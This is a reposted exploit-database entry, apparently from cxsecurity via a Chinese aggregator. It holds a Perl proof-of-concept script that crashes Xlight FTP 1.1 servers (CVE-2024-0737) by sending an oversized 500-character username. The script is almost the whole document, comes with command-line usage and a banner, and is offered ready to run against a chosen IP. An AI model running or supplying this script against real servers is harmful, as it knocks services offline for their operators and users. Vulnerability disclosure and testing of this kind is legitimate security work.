Xlight FTP 1.1 Denial Of Service
Xlight FTP 1.1 存在拒绝服务漏洞(CVE-2024-0737),通过向服务器发送特定payload可导致服务崩溃。 2025-7-28 21:37:49 Author: cxsecurity.com(查看原文) 阅读量:15 收藏

Xlight FTP 1.1 Denial Of Service

# Exploit Title: Xlight FTP 1.1 - Denial Of Service (DOS) # Google Dork: N/A # Date: 22 July 2025 # Exploit Author: Fernando Mengali # LinkedIn: https://www.linkedin.com/in/fernando-mengali/ # Vendor Homepage: https://www.xlightftpd.com # Software Link: N/A # Version: 1.1 # Tested on: Windows XP # CVE: CVE-2024-0737 $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x41"x500; my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@"; $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!"; $ftp->quit; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print q { ,--, _ ___/ /\| ,;'( )__, ) ~ // // '--; ' \ | ^ ^ ^ [+] LightFTP 1.1 - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: [email protected] } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } }



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2025070035
如有侵权请联系:admin#unsafe.sh